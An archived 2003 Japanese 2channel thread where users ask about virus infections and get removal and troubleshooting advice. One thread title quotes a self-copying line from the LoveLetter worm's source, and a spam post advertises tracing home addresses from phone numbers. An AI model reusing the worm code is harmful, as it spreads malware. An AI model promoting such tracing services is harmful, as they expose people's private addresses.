5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ウィルス情報&質問 総合スレッド☆part9

1 :名無しさん@お腹いっぱい。:03/02/21 17:35
ウィルスに関わる話題・質問はこちらに
ウィルスかどうかはウィルススキャンして判断してください。

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response
http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報
http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報
http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp

[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50

2 :1:03/02/21 17:35
・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50

・[Ctrrl]か{コマンド}と{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください
2chスレッド検索http://www.ruitomo.com/~gulab/k.html

・ノートンを使用して誤反応かな と思う人はこちら
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50

シマンテックセキュリティチェック(オンラインウィルススキャンができる)
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp


3 :1:03/02/21 17:36
過去スレ
このウイルス何?
http://pc.2ch.net/test/read.cgi/sec/999636595/l50
☆ウィルス情報&質問 総合スレッド☆
http://pc.2ch.net/sec/kako/1010/10109/1010948022.html
☆ウィルス情報&質問 総合スレッド☆part2
http://pc.2ch.net/sec/kako/1016/10168/1016863569.html
☆ウィルス情報&質問 総合スレッド☆part3
http://pc.2ch.net/sec/kako/1020/10206/1020696417.html
☆ウィルス情報&質問 総合スレッド☆part4
http://pc.2ch.net/sec/kako/1024/10240/1024061532.html
☆ウィルス情報&質問 総合スレッド☆part5
http://pc.2ch.net/sec/kako/1027/10273/1027397623.html
☆ウィルス情報&質問 総合スレッド☆part6
http://pc.2ch.net/sec/kako/1031/10317/1031796923.html
☆ウィルス情報&質問 総合スレッド☆part7
http://pc.2ch.net/sec/kako/1035/10354/1035401865.html
☆ウィルス情報&質問 総合スレッド☆part8
http://pc.2ch.net/test/read.cgi/sec/1039859073/

4 : ◆FdL1jBqM3g :03/02/21 17:36
>>1士ね

5 :1:03/02/21 17:36
Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
オンラインウイルス検索
http://housecall.antivirus.com/housecall/start_jp.asp

検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。

Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html

TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/

McAFEEウイルス情報
http://vil.mcafee.com/default.asp?

6 :1:03/02/21 17:37
[ウィルス対策ソフト] 
【ノートン】インターネットセキュリティ Ver.20【2003】
http://pc.2ch.net/test/read.cgi/sec/1045790391/l50
【不具合】ウイルスバスター2003Part7【警告書】
http://pc.2ch.net/test/read.cgi/sec/1045411876/l50
がんばれマカフィーPART2
http://pc.2ch.net/test/read.cgi/sec/1036507506/l50
がんばれ!!ウイルス警備隊V3
http://pc.2ch.net/test/read.cgi/sec/1005442785/l50

[ウィルス対策ソフト(無料)]
無料ウィルス用ソフトAVP/AVG/Ad簡(その2
http://pc.2ch.net/test/read.cgi/sec/1027400238/l50
H+BEDV Antivir Personal Edition Part2
http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
【フリー】AVG Anti-Virus Version6
http://pc.2ch.net/test/read.cgi/sec/1043502704/l50
アンチドートを語ろう♪
http://pc.2ch.net/test/read.cgi/sec/1003987914/l50
最強のウィルス対策用ソフト
http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

7 :1:03/02/21 17:37
「森で遊ぼう」
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解
説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危な
いと感じた人達へ
ネスケ(ネットスケープコミュニケータ)やOperaを使用するという手段があることも
念頭にいれておいてください
http://home.netscape.com/ja/
http://www.jp.opera.com/

8 :1:03/02/21 17:37
新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その4】
http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)
http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス
http://pc.2ch.net/sec/kako/1001/10016/1001662997.html
Flashムービーに感染するウィルスが登場!
http://pc.2ch.net/sec/kako/1010/10105/1010564675.html
'code red'wormに続きw32/sircam
http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何?
http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール!
http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページ
http://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A
http://pc.2ch.net/sec/kako/1007/10075/1007514716.html
Mac用ウイルス対策ソフト 
http://pc.2ch.net/test/read.cgi/sec/1007675941/l50

9 :1:03/02/21 17:38
virus下さい。
http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ!!
http://pc.2ch.net/test/read.cgi/sec/1008248305/l50 
[初心者必見]分かりやすいnimda対策ページ
http://pc.2ch.net/sec/kako/1001/10014/1001407163.html
コードレッドパート5 日本政府は反省汁
http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに?
http://pc.2ch.net/sec/kako/1011/10113/1011333304.html
怪奇画像(怖い女)が一定感覚で現れる症状
http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔が
http://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・!!(Myparty)
http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目
http://pc.2ch.net/sec/kako/1012/10122/1012296560.html
破損、トロイ、ウィルス入り 4
http://tmp.2ch.net/download/kako/1016/10168/1016806114.html

10 :1:03/02/21 17:38
【ネット】『C』で記述した初のウイルスが登場
http://news.2ch.net/newsplus/kako/1015/10150/1015048480.html
ダイヤルQ2か国際電話に接続を切り替えるやつ
<IT>CからZドライブを全て上書きするFinal Fantasyワーム
http://news.2ch.net/newsplus/kako/1015/10159/1015938003.html
【ウィルス警報】patch.exeに注意しる!
http://pc.2ch.net/test/read.cgi/sec/1016082075/l50
<IT>ご注意!チェック済み装うウイルス「マイライフB」
http://news.2ch.net/newsplus/kako/1016/10168/1016802914.html
ADSLユーザーにも 国際電話発信トラブル
http://pc.2ch.net/test/read.cgi/sec/1016106504/l50
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】
http://pc.2ch.net/sec/kako/1016/10164/1016485189.html
IE5・5と6・0、ネット閲覧ソフトに欠陥
http://pc.2ch.net/test/read.cgi/sec/1005605775/l50
PE_Mtx.A, WORM_MTX.A に犯されました。
http://pc.2ch.net/sec/kako/1015/10159/1015939831.html
開いただけでウイルスに感染するページ
http://pc.2ch.net/test/read.cgi/sec/994847789/l50
Klez系,Klez.Eスレッド
http://pc.2ch.net/sec/kako/1018/10182/1018248786.html

11 :1:03/02/21 17:38
インターネット悲しい目をした犬
http://pc.2ch.net/sec/kako/1018/10181/1018186700.html
【勇気が無くてみれない画像スレッド】
http://ex.2ch.net/entrance/kako/1018/10186/1018680687.html
♂MCAFEEのウィルススキャン どうよ♂
http://pc.2ch.net/software/kako/1001/10018/1001838214.html
【流行の】Frethem【ヨカーン】
http://pc.2ch.net/test/read.cgi/sec/1026734507/l50
Klez.E、Klez系スレッド part3
http://pc.2ch.net/sec/kako/1024/10242/1024255721.html
●HDD全消去ウイルス3●
http://pc.2ch.net/sec/kako/1024/10249/1024943662.html
恐怖のHDD破壊ウイルス:いたづらしてごめんね
http://pc.2ch.net/test/read.cgi/sec/1018874433/l50
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/l50(dat状態)
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs 2
http://news.2ch.net/test/read.cgi/news/1028112477/
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/l50
Klez.E、Klez系スレッド part4
http://pc.2ch.net/test/read.cgi/sec/1030175440/l50
SQLExp(SQLP,Slammer,1434番ポート)スレッド 1
http://pc.2ch.net/test/read.cgi/sec/1043525470/l50
ポート137でスキャン増加が発生
http://pc.2ch.net/test/read.cgi/sec/1033726535/l50

12 :名無しさん@お腹いっぱい。:03/02/21 17:42
>>4
氏ね
http://www.google.co.jp/search?q=%E2%97%86FdL1jBqM3g&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

13 :1:03/02/21 17:51
情報・質問 よろしこ

14 :名無しさん@お腹いっぱい。:03/02/21 17:59
メールでウイルスらしきものが送られてきたのですが
それからしばらくしてから
Cフォルダの中に t3vvから続くネームのファイルが数十個できてます
容量は0ですがネットゲームなどでLAGが激しくなって辛いです。。。
なんのウイルスですかね?


15 :名無しさん@お腹いっぱい。:03/02/21 18:02
>>1 乙かれ

16 :名無しさん@お腹いっぱい。:03/02/21 18:03
>>14
>ウィルスかどうかはウィルススキャンして判断してください。
>>1>>4

17 :名無しさん@お腹いっぱい。:03/02/21 18:05


18 :名無しさん@お腹いっぱい。:03/02/21 20:55
port17300ってなに?なぜ話題にならないの

19 :名無しさん@お腹いっぱい。:03/02/21 21:44
質問です

VBS.LoveLetter.Var
VBS.LoveLetter.A
Macro.srcが2つ
W32.Klez.H@mm

上記のウィルスに感染したことがNorton AntiVirusでわかりました。
検疫から復元しようとしても「復元できませんでした」と表示され、どうしてよいか悩んでいます。

感染ファイルはソフトにより隔離されているようなのですが、これらのファイルは削除してもよいのでしょうか?
batファイルやinstall.exeなども含まれています。

アドバイスよろしくお願いいたします。

20 :名無しさん@お腹いっぱい。:03/02/21 22:01
REDLOFって危険ですか?かってに増殖とかするのでしょうか

21 :名無しさん@お腹いっぱい。:03/02/21 22:03
>>19
判断できませんが、何か?
具体的なファイル名を晒しなさい。

22 :cheshire-cat ◆PhCATJR.v6 :03/02/21 22:48
>>20
ある程度はご自身で調べられてはいがかでしょうか。

http://members.jcom.home.ne.jp/aisora/subREDLOF.htm
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_REDLOF.A
http://www.symantec.com/region/jp/sarcj/data/h/html.redlof.a.html
http://www.nai.com/japan/virusinfo/virR.asp?v=VBS/Redlof@M
http://www.sophos.co.jp/virusinfo/analyses/vbsredlofa.html
http://www.ah.wakwak.com/~winfaq/cgi-bin/wforum.cgi?mode=allread&no=226118&page=0


23 :19:03/02/21 23:31
>>21
ファイル名は

1034171196.dat
1034781170.dat
1036519761.dat
1041230281.dat
app[1].bat
bgcolor.exe
hspace.scr
install.exe
yuzu2

です。

24 :ひろちゃん:03/02/22 00:53
前スレに間違って書き込んでしまったのでこちらにコピペさせてもらいます
>>705
>>800番台
でsvchost.exeの話が出ていましたが、私も聞きお尋ねしたいことがあるのでよろしくお願いします

当方環境
NT:FileServer *1 / 98:proxy *1 / 98.SE.Me: *10 / xpHome: *9

ある日会社に出社すると、meマシンのタスク右下に****ゲートウェイデバイス(忘れた、レジ〜だったような)が発見されましたとメッセージが出ました
誰かTAかなにかの通信機器を増設したのかなと思っていましたが。起動するたびに毎回出るしネットワークに依存するアプリケーションの
レスポンスが悪くなったので、調査を開始

最近導入したxp4台の内一番怪しい(管理がずさんなPC)をLANから外してみました..するとBINGO!!です、起動時Meのメッセージは表示されなくなりました。
タスクマネージャー確認しトラフィックを発生させると思わせる項目NetworkService(当たり前)でsvchost.exeの項目があったので他のマシンを確認してみると他のマシンは4つ稼動がしていないのに、管理がずさんなPCは5つ稼動していました。
そこでググって見るとsvchostとCodeBlue関連の説明があり、ずさんPCの再インストールをしてMSのSP1も導入
するとMeの起動時メッセージも出なくなりスタンドアロンのアプリ(98系でのみ稼動)も異常の発生する前に回復しました


25 :ひろちゃん:03/02/22 00:53
ひと段落した思いきや、別のxpもレスポンスが悪いとの報告が有ったので調査開始
再インストールをしてもレスポンスに波があるというか、なかなかつながりません、一旦つながるとサクサク行くのですが急に悪化したりという状況
LANカードのドライバの入れなおし、ハブの交換、LANケーブルの交換...すべてだめ

そこでproxyのZAとBJDを停止したのですが解消されず
NTを止めるとxpとMe間ではサクサクとデータが流れます

多分NTも感染していると思われるのですが、単純に怪しい実行ファイルの削除・レジストリの変更をするだけでいいのでしょうか?
あと、このような現象が起こるのはCodeBlueで間違いないと考えて良いのでしょうか?
よろしくお願いいたします

http://www.google.co.jp/search?hl=ja&ie=UTF-8&oe=UTF-8&q=codeblue+svchost&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja
http://www.isskk.co.jp/support/techinfo/general/codebluej_xforce.html
ここを見ると3年前にパッチが出ていると書いていますた....逝ってよしですね


26 :名無しさん@お腹いっぱい。:03/02/22 01:27
特定のアドレスから毎日数通ウイルスが送られてくるのですが
携帯メールみたいに受信拒否指定みたいなやり方があったら教えてください。

27 :名無しさん@お腹いっぱい。:03/02/22 01:45
>>26
最低でもメーラーの名前は書かないと、誰も返事してくれません
アウトルックエクスプレスならツール中のメッセージルールだが...


28 :名無しさん@お腹いっぱい。:03/02/22 01:48
>>27
忘れてました。すいません。
@メールというやつです。富士通です。

29 :cheshire-cat ◆PhCATJR.v6 :03/02/22 07:58
>>24-25
CodeBlueは、感染例がほとんど無いんですが。IIS導入してなければ、喰らわないし。

svchost.exeというファイルを作成しるウイルスは、こゆのもあったりして。
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.cozit.html
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.litmus.203.b.html

>一旦つながるとサクサク行くのですが急に悪化したりという状況
>NTを止めるとxpとMe間ではサクサクとデータが流れます

パソのネットワーク関連の設定ミスとかって可能性は無いんでしょか。
台数がやや多いようですが、マスタブラウザとかブラウジングとか。
ZoneAlarmって、そゆ名前解決のトラフィックはブロックしても表示してくれなかったりするんで。
Sygate PFWのFree版突っ込んで、パケットログを取るように設定して、BlockAllをポチッと押して観測しるとか。
http://soho.sygate.com/
http://members.tripod.co.jp/eazyfox/Firewall/Sybergen/Ver4/syga41.htm

30 :名無しさん@お腹いっぱい。:03/02/22 09:22
>>24

怪しいファイルはとりあえず解析してもらうってのはどうでしょう?

http://www.symantec.co.jp/region/jp/sarcj/reference/submit.html

31 :メールヘッダは??????:03/02/22 10:59
>>26
ToとFromを削除して書き込んでくれ。

32 :名無しさん@お腹いっぱい。:03/02/22 11:03
>>31
だから、古いデータベース貼りつけるなよ。
お前だろ?xreaスレで不正中継がどーたらこーたら言って恥かいた奴は。

33 :名無しさん@お腹いっぱい。:03/02/22 11:05
>>31
お前のコピぺ内容は古いデータばっかりだな。
ちゃんと自分で確認してるのか?

34 :33:03/02/22 11:05
あら、ケコーン

35 :ひろちゃん:03/02/22 11:10
レスありがとうございます

最初に感染経路とその状況も書いたほうがよかったですね
感染経路:ほかの会社に仕事に行ってP2Pでつないで仕事をした
     そこの会社では仕事中に職員がMXしてたという話...(W
状況  :ノートン2002導入済み パッチも12月後半までの分は実施済み

なぜCodeBlueと考えたかというと、exeファイルなのでアンチウィルスには引っかかりづらいとの記述があったからです
でも、たしかCodeBlueであればc\windows\にexeファイルがあるはずなのに、それが見つけられない...
Meは影響を受けていない

>>29さんへ
>パソのネットワーク関連の設定ミスとかって可能性は無いんでしょか
いまトラフィックが発生しているXpも去年の時点ではなんともたかったのです
再インストール(怪しい)PCを導入した時点では、ネットワークに何の障害も出ていなかったですし

>>Sygate PFWのFree版突っ込んで、パケットログを取るように設定して、BlockAllをポチッと押して観測しるとか
なりほどそういう手がありますね、クライアントに入れてほっとけば、どこからパケットが飛んで来てるか判るのですね
外部につながるクライアントにはアンチウィルスを入れていたのですが、NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
NTにノートンを入れて検索もやってみます
私が書いた、NTを止めてxpとMeでは問題なしということであれば、NTに依存する問題であるという考えは間違ってるでしょうか?

>>30さんへ
怪しいファイルを見つけられないのです...

原因が判らないと社内大インストール大会が始まります....(藁藁藁


36 :ひろちゃん:03/02/22 11:14
>外部につながるクライアントにはアンチウィルスを入れていたのですが、NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
これSygate PFWのことではなくてノートンのことです


37 :初心者:03/02/22 13:22
質問です。
当方Windows2000、ウイルスバスター2003使用のPCなのですが、
さきほどからパソコンがガリガリ鳴り出しまして、ウイルスバスターの
パーソナルファイアーウォールログをみましたところ、
「トロイの木馬ブロック」が一分間に何回もあるみたいなんです。
不安になって接続切ってウイルス検索かけたのですが、ウイルスは検出されませんでした。
ウイルスないのに木馬が攻撃してくることってあるのでしょうか?

ちなみに数日前まで、STDE9.exeというファイルがウイルス検索に引っかかり、
調べてみたところTROJ_FLOOD.BI.DRに犯されていたのですが、
trendmicroのホームページ通りの処置をしてここ数日間はウイルスの検出が
ない状態でした。今回はウイルス検出もないのにトロイアタックを受けて
へこんでいます。アドバイスお願いします。

38 :名無しさん@お腹いっぱい。:03/02/22 13:26
>>37
トロイの木馬ブロックってのは
必ずしもトロイが進入しようとしたってわけではなく
ある種のトロイがよく使うPortに何か来たよ、って警告だと思われ
ゴミパケかも知れないし、トロイかも知れない
ただ、ブロックで出てればほぼ問題はないと思われ

39 :初心者:03/02/22 13:35
さらに調べたところ、以下のような記述が掲示板にありました。

>外部からの操作を可能にするための通信プログラムである "PSEXEC.EXE" を使用して、「TROJ_FLOOD.BI.DR」のコンポーネントである "STDE9.EXE" を作成して実行します。
>また、"PSEXEC.EXE"はプログラム自体の機能としては不正なものではありませんのでウイルス検出はありません。
タスクバーの何も無い部分でマウス右押し→タスクマネージャー→プロセスで確認して味噌。

この操作をしたところ、PSEXEC.EXEはなかったのですが、PSEXESVC.EXEというものがみつかりました。
どう対処すればよいのでしょうか?お願いします。

40 :名無しさん@お腹いっぱい。:03/02/22 13:47
>>39
もう1回ウイルスバスターで全てのドライブをスキャン。

41 :初心者:03/02/22 14:20
バスター検索では発見できなかったので、ノートンの方のオンラインスキャンを試してみました。
その結果、
C:\WINNT\Temp
C:\WINNT\Web
C:\WINNT\system32
のなかから
Backdoor.IRC.Zcrew
IRC.Trojan
Backdoor.Sdbot
の三種類に感染したファイルが全部で19個見つかりました。
ただし、メモリ上でウイルスは見つかりませんでした、とも表示されました。
バスター君では検出してくれないので対応しようがないのでしょうか?
一応トレンドマイクロのHPでウイルス名で検索して対応策をとってみます。
あぁ・・・19個もとは・・・鬱だ

42 :初心者:03/02/22 15:03
度々すみません。今さっき、下記のウイルスが検出されました・・・
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GLITCH.DRP
削除手順の1)2)はレジストリが存在しなかったため、作業を飛ばして
3)をやっているのですが、
explorer.exeはウインドウズが使用中と表示されて削除することが出来ません。
どうすればよいでしょうか?

43 ::03/02/22 15:15
↓↓↓↓↓★ココだ★↓↓↓↓↓
http://jsweb.muvc.net/index.html

44 :名無しさん@お腹いっぱい。:03/02/22 15:27
>>42
ノートンオンラインスキャンでexplorer.exeが感染してなければ削除しなくていい。感染してたら君には無理そう。
データのバックアップとって、素直に再インストが一番速いと思う。

45 :初心者:03/02/22 15:38
でも一分間に10回もトロイアタックがあってパソコンがカタカタとうるさいのです。
それ以外の被害は格別ないといえばないのですが。

46 :tantei:03/02/22 16:12
★あなたのお悩み解決致します!!
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
 直通  090−8505−3086
URL  http://www.h5.dion.ne.jp/~grobal/
メール  hentaimtt@k9.dion.ne.jp
   グローバル探偵事務局 



47 :19:03/02/22 19:04
>>21さんに言われたとおり>>23の方にファイル名を書いたのですが
どなたかわかる方いらっしゃいませんでしょうか?

48 :名無しさん@お腹いっぱい。:03/02/22 19:12
>>47
ノートンが復元できなくて、それを使いたいなら手動で復元しなきゃいけないわけだが、
>>47はできないんだろう。それなら削除してしまえ。
本当に必要なプログラムは正規ユーザならバックアップ媒体から復元できるから問題ない。

49 :cheshire-cat ◆PhCATJR.v6 :03/02/22 19:51
>ひろちゃんたん
>NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
ノートンって、ネットワーク経由でスキャンできなかったっけ?
以前やった記憶が。
もちろん、捨てルーター経由で2台だけ接続してやりますたが。

んでも漏れは多少手間かかっても、HDぶっこ抜いてやってまする(お奨めしませぬが)。
で、レジストリは手動で修復みたいな。

>NTを止めてxpとMeでは問題なしということであれば
NTってServerでしょか、それともWorkstation。漏れはWorkstationだと判断してレスしたんすけど。

ブラウジング関連としては。
http://www.samba.gr.jp/doc/browsing/browsing01.html
http://www.zdnet.co.jp/help/howto/win/win2000/0007special/dns/chap1/11.html
http://homepage2.nifty.com/winfaq/c/network.html#986
http://support.microsoft.com/default.aspx?scid=kb;ja;JP136712
http://www.ms-atelier.com/mobile/thinkpad/2000.html

50 :19:03/02/22 20:01
>>48
レスどうもです!

もちろん正規ユーザです。
ノートンが検疫で見つけた感染ファイルは自動でバックアップが取ってあるということなのでしょうか?

ここだとスレ違いかもしれませんがOpenJaneを使ってまして、そのdatファイルが感染しているようなのです。
他にもJane以外での感染もあるのですが、Janeのdatファイルについているウィルスというのは
本当にウィルスなのでしょうか?勝手な想像なのですが、Janeの中のスクリプトなどを勘違いしているとも思いました。

結局、ノートンがウィルスを発見した段階で元ファイルを隔離してくれているとしたら
何も考えずに感染ファイルは削除してもよいということで合ってますか?


51 :名無しさん@お腹いっぱい。:03/02/22 20:03
>>50
ウィルスじゃないな・・・
もちろん>>2に書かれていた
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50
↑は見たよな、見てから聞いてるんだよな、
 当然考えられる検索はやったもんな

52 :ひろちゃん:03/02/22 20:43
>ノートンって、ネットワーク経由でスキャンできなかったっけ?
>以前やった記憶が。
>もちろん、捨てルーター経由で2台だけ接続してやりますたが。
できますです、やってみます
もう頭から手動でやらないとだめと思っていたものですから、
ありがとうございます


53 :名無しさん@お腹いっぱい。:03/02/22 20:58
ttp://www.asahi-net.or.jp/~bj9k-tn/image/gate2.png

ニムダってMAILER-DAEMONや postmasterからメールを送信することってあるの??

単純に考えれば私が無差別にアドレスを生成してメールを送信すればこのようなことになってもおかしくはないと思うけど

54 :19:03/02/22 21:21
>>51
すみません。見てませんでした・・・(;´Д⊂)

それ以外のKlezなどが怖いです。>>50の後半に書いてある認識でよいのでしょうか?

55 :名無しさん@お腹いっぱい。:03/02/22 22:37
ウイルスなのかどうか困ってます

ノートンINS2003無反応。 バスターオンラインスキャンも検出ナシ
HPの更新かけようとファイルをアップロードするとJavaが勝手に挿入されます。
・・・該当するようなウイルスがあるならウイルス名教えてください (´Д`;)

56 :cheshire-cat ◆PhCATJR.v6 :03/02/22 23:18
>>55
vbsならRedlofとか。

プロバとかの設定の都合で、リファラーとかカウンターとか広告系のジャバスクが挿入とかではないんでしょか。

57 :55:03/02/22 23:51
>>56
スクリプト自体はブラウザを判定するものらしいです。
(イロイロ検索して同じ記述のをJAVAサイトでみかけました)

ファイルをUPしてる鯖はレンタル(有料)のところなので勝手に
スクリプトを挿入される事はないです。

特に害がないようなら気にするな、ですませてしまっても
いいものでしょうか?

58 :名無しさん@お腹いっぱい。:03/02/23 02:32
OSは2K。使用メーラーはBecky! Ver.2です。
ノートンアンチウイルス2003を導入したら
YAHOO!アカウントのメールが送受信できなくなりました。
ISPのメールは送受信できるようになったんだけど。

POP3は ***.*.*.* (*は数字)
SMTPは smtp.mail.yahoo.co.jp
ユーザーIDは ****/pop.mail.yahoo.co.jp(*はアカウント名)なんですけど。
YAHOOメールを使っている方、設定はどうしていますか?

59 :名無しさん@お腹いっぱい。:03/02/23 04:43
レッドロフの症状でデスクトップの壁紙が表示されなくなるってのが
ありますがウイルスを駆除してもそれが直らないのは普通ですか?

60 :cheshire-cat ◆PhCATJR.v6 :03/02/23 07:33
>>59
デスクトップのdesktop.iniとfolder.httを削除するとか。

61 :cheshire-cat ◆PhCATJR.v6 :03/02/23 07:36
>>55
他の所で捨てHP作って試すとか。
http://tadamono.to/homepage.html

あとは、ファイルの保存時とかFTPでの転送時に、htmlエディタが勝手に挿入してるとか。


62 :19:03/02/23 14:56
どなたか>>54の後半部分を答えていただけると助かります。

63 :名無しさん@お腹いっぱい。:03/02/23 18:10
>>62
隔離されたものに正常なファイルはなく
ウイルスプログラムだけです。
隔離リストに入ってしまえば、ファイルは暗号化されるので
ファイルとして正常に動作しません。

64 :19:03/02/23 20:26
>>63
レスありがとうございます。

ということは、再インストールした方がよいということですね?
ノートン導入していて定義も常に気を配っていたにもかかわらず
なぜ、感染してしまったのでしょうか?

添付ファイルは当然のこと、怪しい物には一切手をつけていなんです。
そういう場合でも感染してしまうことってあるのでしょうか?

65 :名無しさん@お腹いっぱい。:03/02/23 21:08
当方win2000使用。ウイルスバスターはいっているのですが、
先日TROJ_GLITCH.DRPが発見されました。(ファイル名はSTDE9.exe)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GLITCH.DRP
以降、ウイルスバスターのファイアーウォールログに5秒に一回くらい
トロイの木馬ブロックが表示されるようになりました。
しかし、全ドライブ検索してもウイルスは見つかりません。
このような場合どう対処すればよいのでしょうか?


66 :名無しさん@お腹いっぱい。:03/02/23 22:56
質問です。
win2000で、何か(忘れた)のウイルスに感染、手動で除去しました
レジストリーも修正しなければならなかったが、やりかたわからず放置
しばらくしたら、ハードディスクがハード的に故障しました。(メーカーいわく)
ウイルスで、ハード故障なんてあるのですか

67 :名無しさん@お腹いっぱい。:03/02/23 23:05
>>66
>ウイルスで、ハード故障なんてあるのですか
あるよ

68 :66です:03/02/23 23:14
>>67
レス サンクスです
あるんですか 
完全に取りきれてなかった為かな やはり

69 :名無しさん@お腹いっぱい。:03/02/23 23:29
>あるよ
( ´_ゝ`)プ

70 :名無しさん@お腹いっぱい。:03/02/23 23:46
>>69
(・∀・)ニヤニヤ

71 :名無しさん@お腹いっぱい。:03/02/23 23:53
>>69
( ´д)ヒソ(´д`)ヒソ(д` )

72 :名無しさん@お腹いっぱい。:03/02/23 23:56
>>69
( ゚д゚)ポカーン

73 :名無しさん@お腹いっぱい。:03/02/24 08:32
age

74 :名無しさん@お腹いっぱい。:03/02/24 10:50
今日、立ち上げたらRっていう文字のついたやつがタスクトレイに!
タスクマネージャーからr_sever.exeってかいたやつが怪しそうだったので
削除しようとするが、送り先が使用中といわれ削除できない!
ウィルススキャンでは、W32.Klez.H@mmトロイに感染したファイルは削除しましたが
Backdoor.Sdbotに感染していると言われたものは削除しようとしましたがそこには
なにもなく?そのままです。どなたか、上記のやつを退治する方法知りませんでしょうか?
ちなみに、シマンテックの推奨する手動駆除方法では、レジストリの変更のところで
この値を探せといっているものが私のパソには見当たらず、はて?と言った感じで
そこで行き詰まっています。よろしくお願いします。
ちなみに、OSはW2Kです。


75 :名無しさん@お腹いっぱい。:03/02/24 10:56
>>74
これだよね。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.sdbot.html
Backdoor.Sdbotの発見場所とどのレジストリが見当たらなかったか明確に。

76 :名無しさん@お腹いっぱい。:03/02/24 11:02
☆森高千里さんの画像☆
http://wow.bbspink.com/test/read.cgi/girls/1039375305/977
( ´,_ゝ‘)プッ

77 :名無しさん@お腹いっぱい。:03/02/24 12:02
質問でつ。よろしくおねがいしまつ。

HPを運営しているんですが、
見た人から「ウィルスに感染してるよ」と報告がありました。
自分ではよくわかんないのですが、ウィルス感染はどこでしらべられますか?
あと対策法をおおしえください。

78 :名無しさん@お腹いっぱい。:03/02/24 12:22
>>77
>>2

79 :名無しさん@お腹いっぱい。:03/02/24 12:23
>>77
アンチウィルス(ウィルス対策製品)ぐらい買って常駐させとけよ。

80 :77:03/02/24 13:51
ご相談するまでもなく解決しますた。
失礼しました〜♪

81 :名無しさん@お腹いっぱい。:03/02/24 15:00
>>80
あのなあ、解決したらしたで、どう解決したか書くのがマナーというもんだ。
二度と来ないでくれ。

82 :名無しさん@お腹いっぱい。:03/02/24 15:29
>>81
まぁこれでも見て落ち着けよ
http://wasi.mods.jp/imgboard/img/img20030219160316.jpg

83 :名無しさん@お腹いっぱい。:03/02/24 15:32
>>82
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!! 夢に出そうだ(w

84 :名無しさん@お腹いっぱい。:03/02/24 16:54
≫75
こんなんでした。

